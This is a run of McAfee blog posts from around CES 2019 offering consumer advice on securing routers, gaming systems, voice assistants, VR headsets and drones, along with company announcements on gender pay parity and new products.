It’s no secret – IoT devices are creeping into every facet of our daily lives. In fact, Gartner estimates there will be 20.4 Billion IoT devices by the year 2020. More devices mean greater connectivity and ease of use for their owners, but connectivity also means more opportunities for hacks. With CES 2019 kicking off this week, we turn our focus toward the year ahead, and take a look at some of the IoT devices that are particularly high-profile targets for cybercriminals: gaming systems, voice tech, routers, and smart cars.

Routers

Routers are very susceptible to attacks as they often come with factory-set passwords that many owners are unaware of or don’t know how to change, making these devices easy targets for hackers. That’s bad news, since a router is the central hub in a connected home. If a router is compromised and all of the devices share the same Wi-Fi network, then they could potentially all be exposed to an attack. How? When an IoT device talks to its connected router, the device could expose many of its internal mechanisms to the internet. If the device does not require re-authentication, hackers can easily scan for devices that have poorly implemented protocols. Then with that information, cybercriminals can exploit manufacturer missteps to execute their attacks. To help protect your router (and thus all your other devices), a best practice is to consider one with a layer of protection built-in, and be sure to use a long and complex password for your Wi-Fi network.

Gaming Systems

Over ten years ago, researchers found that many video gaming consoles were being distributed with major security issues involved with the Universal Plug and Play protocol (UPnP), a feature that allows IoT devices on a network to see each other and interact with one another. However, not much has been done to solve the problem. Through exploiting the UPnP weaknesses in gaming systems to reroute traffic over and over again, cybercriminals have been able to create “multi-purpose proxy botnets,” which they can use for a variety of purposes.  This is just the jumping-off point for malicious behavior by bad actors. With this sort of access into a gaming system, they can execute DDoS attacks, malware distribution, spamming, phishing, account takeovers, click fraud, and credit card theft. Our recent gaming survey found that 64% of respondents either have or know someone who has been directly affected by a cyberattack, which is an astonishing uptick in attacks on gamers. Considering this shift, follow our tips in the section above for routers and Wi-Fi, never use the same password twice, and be weary of what you click on.

Voice Tech

In 2018, 47.3 million adults had access to smart speakers or voice assistants, making them one of the most popular connected devices for the home. Voice-first devices can be vulnerable largely due to what we enable them to be connected with for convenience; delivery, shopping, and transportation services that leverage our credit cards. While it’s important to note that voice-first devices are most often compromised within the home by people who have regular access to your devices (such as kids) when voice recognition is not properly configured, any digital device can be vulnerable to outside attacks too if proper security is not set up. For example, these always-on, always-listening devices could be infiltrated by cybercriminals through a technique called “voice squatting.” By creating “malicious skills,” hackers have been able to trick voice assistants into continuing to listen after a user finishes speaking. In this scenario an unsuspecting person might think they’re connecting to their bank through their voice device, when unbeknownst to them, they’re giving away their personal information.  Because voice-controlled devices are frequently distributed without proper security protocol in place, they are the perfect vehicle in terms of executing a cyberattack on an unsuspecting consumer. To protect your voice assistants, make sure your Wi-Fi password is strong, and be on the lookout for suspicious activity on linked accounts.

While you can’t predict the future of IoT attacks, here are some additional tips and best practices on how to stay ahead of hackers trying to ruin your year:

  • Keep your security software up-to-date. Software and firmware patches are always being released by companies and are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
  • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for smart cars and other IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security.
  • Change your device’s factory security settings. This is the single most important step to take to protect all devices. When it comes to products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as opening the box. By changing the factory settings you’re instantly upgrading your device’s security.
  • Use best practices for linked accounts.  For gaming systems and voice-first devices in particular, if you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
  • Setup a separate IoT network. Consider setting up a second network for your IoT devices that don’t share access to your other devices and data. Check your router manufacturer’s website to learn how. You might also consider adding in another network for guests and unsecured devices from others. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.
  • Use a firewall. A firewall is a tool that monitors traffic between an Internet connection and devices to detect unusual or suspicious behavior. Even if a device is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. When looking for a comprehensive security solution, see if a Firewall is included to ensure that your devices are protected.
  • Up your gaming security. Just announced at CES 2019, we’re bringing a sense of security to the virtual world of video games. Get in on the action with McAfee Gamer Security, Beta, it’s free!

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Protect Three Common IoT Devices in 2019 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/how-to-protect-three-common-iot-devices-in-2019/feed/ 0
Championing Equality: McAfee to Achieve Gender Pay Parity in 2019 https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/championing-equality-mcafee-to-achieve-gender-pay-parity-in-2019/ https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/championing-equality-mcafee-to-achieve-gender-pay-parity-in-2019/#respond Mon, 07 Jan 2019 19:25:48 +0000 https://securingtomorrow.mcafee.com/?p=93600

Recently, the World Economic Forum revealed it will take 202 years for women to achieve economic gender parity at our current rate. Two hundred and two. Let that sink in for a moment. Doesn’t quite seem right does it? At McAfee, we believe every single employee should be compensated fairly and equally for their individual contribution and […]

The post Championing Equality: McAfee to Achieve Gender Pay Parity in 2019 appeared first on McAfee Blogs.

]]>

Recently, the World Economic Forum revealed it will take 202 years for women to achieve economic gender parity at our current rate. Two hundred and two. Let that sink in for a moment. Doesn’t quite seem right does it? At McAfee, we believe every single employee should be compensated fairly and equally for their individual contribution and impact to the company, regardless of gender. Which is why we’re committed to acting now to address any gender pay parity discrepancy in the first half of 2019.

This announcement underlines our unwavering commitment to inclusion and diversity. When McAfee reaches global pay parity in 2019, we will be the first pure-play cybersecurity company to do so. And while study after study reinforces the simple fact that diversity drives prosperity, we’re still falling short with just 11% female representation in cybersecurity.

 

Making significant progress is not going to happen overnight. It also won’t happen on its own. We need greater collaboration to help drive the actions that will change the conversation. So in the spirit of transparency and sharing best practice, here are four steps McAfee is undertaking to achieve gender pay parity:

  1. We define pay parity. At McAfee, pay parity means fair and equal pay for employees in the same job, level and location, controlling for pay differentiators such as performance, tenure and experience, regardless of gender.
  2. We complete our inaugural review. Create job groups by role, level and location to evaluate any discrepancies outside of the predetermined controlling factors.
  3. We adjust pay. If a gap is found between females and males within the group, our purpose is to ensure nothing about a person’s gender is causing the discrepancy and to make adjustments if needed.
  4. We uphold pay parity. This will not be just a point in time review, but an annual analysis to stay the course. But maintaining pay parity also means keeping it at the forefront throughout the year—from our hiring practices to how we promote and reward our employees.

In these four steps lies a momentous promise to equality. Each day, I’m proud to work alongside a team dedicated to creating a workplace where all voices, perspectives and experiences are welcomed, where everyone can belong. But our investment in pay parity is among the most important steps in showing our people we value them, equally.

With this commitment, we continue to live our values, build an inclusive culture, create better workplaces and build stronger communities. I’m honored to join companies beyond the world of cyber already striving towards pay parity and I hope more will join us in reaching this milestone in equality.

Ready to work for a company committed to equality? McAfee is hiring!

Disclaimer: This blog was originally published on LinkedIn

The post Championing Equality: McAfee to Achieve Gender Pay Parity in 2019 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/executive-perspectives/championing-equality-mcafee-to-achieve-gender-pay-parity-in-2019/feed/ 0
Kicking off CES 2019 with New Security Solutions and Collaborations https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019-kickoff/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019-kickoff/#respond Mon, 07 Jan 2019 11:00:08 +0000 https://securingtomorrow.mcafee.com/?p=93580

Today, we at McAfee are announcing some exciting new security solutions and integrations at CES in Las Vegas. For those of you who are unfamiliar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. McAfee now delivers protection to more than 500 million customers worldwide, and we […]

The post Kicking off CES 2019 with New Security Solutions and Collaborations appeared first on McAfee Blogs.

]]>

Today, we at McAfee are announcing some exciting new security solutions and integrations at CES in Las Vegas. For those of you who are unfamiliar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies. McAfee now delivers protection to more than 500 million customers worldwide, and we understand the importance of creating new solutions for those who want to live their connected lives with confidence. To help empower our customers to do this, we’ve added to our security lineup and are working with other tech innovators who understand the importance of protecting users’ online safety.

One addition to our lineup of security solutions is McAfee Gamer Security. In a recent gaming survey, we discovered that 75% of gamers are worried about the security of gaming as online threats continue to rise. To help combat these threats, we developed McAfee Gamer Security, which protects gamers while optimizing their gaming experience. Some of the product’s key features include Game Mode, a gamer-centric interface, and minimal security resource consumption. These features help optimize gamers’ computing resources, provide system status updates, and equip users with lightweight security protection.

In addition to our latest product advancements, we’ve also teamed up with other companies looking to better the cybersecurity landscape for consumers. The first is Google. In order to further simplify the process of securing today’s connected home, McAfee will provide McAfee Secure Home Platform voice commands for the Google Assistant. McAfee Secure Home Platform provides an extra layer of security to help automatically protect all of the connected devices on the user’s home network. Soon, Google Assistant users can easily manage their connected home security by just using their voice.

While it’s important to secure the connected home, it is also important to protect your mobile and IoT devices as well. According to McAfee Labs 2019 predictions, cybercriminals will leverage trusted devices like smartphones and tablets to try and access users’ IoT devices in the upcoming year. To help customers stay safeguarded from this threat, we’ve teamed up with Verizon to protect their home networks through Verizon Home Network Protection. This McAfee-powered solution helps Verizon Fios customers stay secured against malicious websites, provide parental controls, and protect all devices connected to their home network.

Furthermore, we at McAfee and Dell have teamed up to protect consumers and small businesses as they enjoy the benefits of today’s technology. To do this, we’ve expanded our collaboration to provide pre-installed McAfee software on PCs and laptops globally to both consumer and small business customers. Customers who purchase a new laptop or PC will also have the option to extend McAfee protection beyond their Dell device to their smartphones and tablets. This allows users to have a more robust security shield around all of their connected devices, creating a safer overall online experience. Dell consumer and small business customers who purchase Dell Inspiron, XPS, Vostro, and G-Series laptops will receive a 30-day or 1-year subscription. Customers who purchase Alienware, OptiPlex, Latitude, and Precision will have the option of adding a 30-day free subscription or purchasing a 1-year subscription.

Another one of our latest innovations is the addition of Cryptojacking Blocker to McAfee WebAdvisor. As we observed in our latest McAfee Labs report, coin mining malware is on the rise, growing more than  4000% in the last year. Cryptojacking Blocker helps protect users from having their devices hijacked without their knowledge or permission. The tool helps prevents websites from mining for cryptocurrency and is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

So far, CES 2019 has proven that innovation will continue to evolve, just as the cybersecurity landscape will continue to mature. By working together to improve the technology that protects connected devices, we can help users optimize their digital life without compromising their online safety.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking off CES 2019 with New Security Solutions and Collaborations appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-2019-kickoff/feed/ 0
Do Your Kids Love Gaming? Know How to Protect Them from A Cyberattack https://securingtomorrow.mcafee.com/consumer/family-safety/do-your-kids-love-gaming-know-how-to-protect-them-from-a-cyberattack/ https://securingtomorrow.mcafee.com/consumer/family-safety/do-your-kids-love-gaming-know-how-to-protect-them-from-a-cyberattack/#respond Sat, 05 Jan 2019 15:00:35 +0000 https://securingtomorrow.mcafee.com/?p=93560 online gaming

Fortnite, Call of Duty Black Ops 4, Red Redemption 2, Spiderman, and Assassin’s Creed: Odyssey. If you are the parent of a teenager, you know all about some of these popular online games, and you may even play some yourself. What you may not know is that while your child is fully engaged in his […]

The post Do Your Kids Love Gaming? Know How to Protect Them from A Cyberattack appeared first on McAfee Blogs.

]]>
online gaming

online gamingFortnite, Call of Duty Black Ops 4, Red Redemption 2, Spiderman, and Assassin’s Creed: Odyssey. If you are the parent of a teenager, you know all about some of these popular online games, and you may even play some yourself. What you may not know is that while your child is fully engaged in his or her favorite online game, he or she may be in the digital crosshairs of a cyber thief.

According to reports, more than 2.2 billion video gamers helped bring that industry more than $108 billion in revenue in 2017, so it’s not surprising that scammers are following the money.

McAfee Gaming Survey

A recent gaming survey from McAfee uncovered some valuable insights into the gaming world and security. The good news is that most gamers have cybersecurity on their radar (75% of PC gamers chose online security as the issue that most concerned them about the future of gaming). The not-so-good news is that of the gamers surveyed; most still aren’t practicing the best online habits such as reusing passwords across multiple accounts (55%). In addition, the average gamer has experienced almost five cyberattacks due to poor security habits (see graphic, right).

Common Scams

Online cheats or downloads. Gamers love to get and edge on their favorite game, so when they go search online for cheats or someone sends them a link for a cheat or download, they will likely click. That fake cheat can lead to malware, bitcoin theft, or identity theft.

Fake apps. Scammers are capitalizing on favorite games such as Red Dead Redemption 2 by luring users to download the game for free only to trick them into divulging their personal information. Remember, if you come across a download offer that seems too good to be true, it probably is.

Fraudulent trades. Many games often include extras that a gamer can buy for their characters such as weapons, armor, skins, or clothing. Some scammers will offer to purchase or trade items outside of the platform and then dupe the buyer through a phishing link that gains access to his or her credit card information.

Impersonation/Catfishing. Some scammers go to great lengths to access a gamer’s personal information. They will befriend a gamer over time, gain trust, and take advantage of the gamer emotionally or financially in some way.

Account takeovers. This scam is when a hacker gains access to a legitimate player’s account (usually a popular player), blocks that user from accessing his or her account, and uses that account to send out spammy emails, fake offers, and malicious links.

Gaming Safety Tips

  • Don’t reuse passwords. It may take a minute or two longer to log into your favorite games, but there’s a significant layer of protection when you use a unique password for each of your online accounts. Reusing passwords allows a hacker to gain access to multiple accounts once you’ve been compromised.
  • Use a firewall. Gamers should use a firewall to help block would-be attackers from gaining access to their PC and home networks.
  • Smart clicking. Gaming is immersive. Because of that, crooks know that players may have their guards down. Players should never impulsively click on links in messages from people they don’t know. One wrong click can lead to malware, ransomware, or other phishing schemes.online gaming
  • Add extra security. It’s always a good idea to put another layer of protection between you and a hacker. To protect devices from malware and other threats, use a comprehensive security solution like McAfee Total Protection.
  • Browse with caution. Scammers may target gamers through other popular websites like YouTube and Twitter to push out malicious content. Be wise when browsing these sites and keep your guard up when clicking on any game link or offer.
  • Act fast. If you suspect a scam within a game, report it to the developers immediately to help stop the spread and protect other users.

The post Do Your Kids Love Gaming? Know How to Protect Them from A Cyberattack appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/do-your-kids-love-gaming-know-how-to-protect-them-from-a-cyberattack/feed/ 0
Level Up Your Cybersecurity: Insights from Our Gaming Survey https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-gaming-survey/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-gaming-survey/#respond Wed, 02 Jan 2019 05:30:20 +0000 https://securingtomorrow.mcafee.com/?p=93063

Online gaming has seen a rise in popularity over the years. Many people see it as a way to unwind from a stressful day or complete new challenges. However, just like any other internet-connected channel, online gaming can expose users to a variety of cybersecurity risks. So, to examine the relationship between cybersecurity and gaming, […]

The post Level Up Your Cybersecurity: Insights from Our Gaming Survey appeared first on McAfee Blogs.

]]>

Online gaming has seen a rise in popularity over the years. Many people see it as a way to unwind from a stressful day or complete new challenges. However, just like any other internet-connected channel, online gaming can expose users to a variety of cybersecurity risks. So, to examine the relationship between cybersecurity and gaming, we decided to survey 1,000 U.S. residents ages 18 and over who are frequent gamers. *

Time to Upgrade Your Online Safety

Of those surveyed, 75% of PC gamers chose security as the element that most concerned them about the future of gaming. This makes sense since 64% of our respondents either have or know someone who has been directly affected by a cyberattack. And while 83% of the gamers do use an antivirus software to protect their PCs, we found that gamers still participate in risky online behavior.

Poor Habits Could Mean Game Over for Your Cybersecurity

So, what does this risky behavior look like, exactly? The following sums it up pretty well:

  • 55% of gamers reuse passwords for multiple online accounts, leading to greater risk if their password is cracked.
  • 36% of respondents rely on incognito mode or private browsing to keep their PC safe.
  • 41% read the privacy policies associated with games, though this technique won’t help to keep their device secure.

With these lax habits in place, it’s not hard to believe that 38% of our respondents experienced at least one malicious attack on their PC. And while 92% installed an antivirus software after experiencing a cyberattack, it’s important for gamers to take action against potential threats before they occur.

Level Up Your Gaming Security

Now the question is – what do these gamers need to do to stay safe while they play? Start by following these tips:

  • Do not reuse passwords. Reusing passwords makes it easier for hackers to access more than one of your accounts if they crack one of your logins. Prevent this by using unique login credentials for all of your accounts.
  • Click with caution. Avoid interacting with messages from players you don’t know and don’t click on suspicious links. Cybercriminals can use phishing emails to send gamers malicious files and links that can infect their device with malware.
  • Use a security solution. Using a security service to safeguard your devices can help protect you from a variety of threats that can disrupt your gaming experience. Look out for our newest product McAfee Gamer Security, which we launched just in time for CES 2019. Although this product is still in beta mode, it could be used to combat cyberthreats while optimizing your computing resources.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

*Survey respondents played video games at least four times a month and spent at least $200 annually on gaming.

The post Level Up Your Cybersecurity: Insights from Our Gaming Survey appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/ces-gaming-survey/feed/ 0
Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  https://securingtomorrow.mcafee.com/consumer/family-safety/mind-bending-tech-what-parents-need-to-know-about-virtual-augmented-reality-%ef%bb%bf/ https://securingtomorrow.mcafee.com/consumer/family-safety/mind-bending-tech-what-parents-need-to-know-about-virtual-augmented-reality-%ef%bb%bf/#respond Sat, 29 Dec 2018 15:03:54 +0000 https://securingtomorrow.mcafee.com/?p=93545

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies? VR and AR technology sound a bit sci-fi and intimidating, […]

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

]]>


Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments on either a PC or smart phone that allows them to feel — or experience the illusion — that he or she is actually in that place. The VR headset has eye displays (OLED) for each eye that show an environment at different angles to give the perception of depth. VR environments are diverse. One might include going inside the human body to learn about the digestive system, another environment might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent and allows you to see and interact with your environment. It adds digital images and data to enhance views of the real world. AR is used in apps like Pokémon Go and GPS and walking apps that allow you to see your environment in real time. Not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, live music and events available. Museums and arcades exist and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents such as what effect will these immersive technologies have on children’s brains and if VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: At this point, not a lot is known about VR’s affect on children but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/mind-bending-tech-what-parents-need-to-know-about-virtual-augmented-reality-%ef%bb%bf/feed/ 0
McAfee 2018: Year in Review https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/ https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/#respond Fri, 28 Dec 2018 18:37:54 +0000 https://securingtomorrow.mcafee.com/?p=93538

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee […]

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

]]>

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-2018-year-in-review/feed/ 0
The #1 Gift Parents Can Give Their Kids This Christmas https://securingtomorrow.mcafee.com/consumer/family-safety/the-1-gift-parents-can-give-their-kids-this-christmas/ https://securingtomorrow.mcafee.com/consumer/family-safety/the-1-gift-parents-can-give-their-kids-this-christmas/#respond Sat, 22 Dec 2018 15:00:56 +0000 https://securingtomorrow.mcafee.com/?p=93327

You won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it. Even so, it is one of the most meaningful gifts you can give your child this year. […]

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

]]>

quality time with kidsYou won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to it’s hiding place and reconnect to the moment.

This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

Here are a few ideas to inspire you forward:

  1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.quality time with kids
  2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
  3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
  4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
  5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/the-1-gift-parents-can-give-their-kids-this-christmas/feed/ 0
Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/rogue-drones-cause-gatwick-airport-to-close/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/rogue-drones-cause-gatwick-airport-to-close/#respond Sat, 22 Dec 2018 01:35:46 +0000 https://securingtomorrow.mcafee.com/?p=93358

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs […]

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

]]>

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs a new hobby, but what happens when these flying robots cause a safety hazard for others? That’s exactly what happened at the Gatwick airport on Wednesday night and again today when two drones were spotted flying over the airfield, causing all departing flights to remain grounded and all arriving flights to be diverted to other airports.

The drones were spotted flying over the Gatwick airport’s perimeter fence into the area where the runway operates from. This disruption affected 10,000 passengers on Wednesday night, 110,000 passengers on Thursday, and 760 flights expected to arrive and depart on Thursday. More than 20 police units were recruited to find the drone’s operator so the device could be disabled. The airport closure resulted in 31.9 hours with no planes taking off or landing between Wednesday and Thursday.

You might be wondering, how could two drones cause an entire airport to shut down for so long? It turns out that drones can cause serious damage to an aircraft. Evidence suggests that drones could inflict more damage than a bird collision and that the lithium-ion batteries that power drones could become lodged in airframes, potentially starting a fire. And while the probability of a collision is small, a drone could still be drawn into an aircraft turbine, putting everyone on board at risk. This is why it’s illegal to fly a drone within one kilometer of an airport or airfield boundary. What’s more, endangering the safety of an aircraft is a criminal offense that could result in a five-year prison sentence.

Now, this is a lesson for all drone owners everywhere to be cognizant of where they fly their devices. But beyond the physical implications that are associated with these devices, there are digital ones too — given they’re internet-connected. In fact, to learn about how vulnerable these devices can be, you can give our latest episode of “Hackable?” a listen, which explores the physical and digital implications of compromised drones,

Therefore, if you get a drone for Christmas this year, remember to follow these cybersecurity tips to ensure you protect them on the digital front.

  • Do your research. There are multiple online communities that disclose bugs and potential vulnerabilities as well as new security patches for different types of drones. Make sure you stay informed to help you avoid potential hacks.
  • Update, update, update! Just as it’s important to update your apps and mobile devices, it’s also important to update the firmware and software for your drone. Always verify the latest updates with your drone manufacturer’s website to make sure it is legitimate.

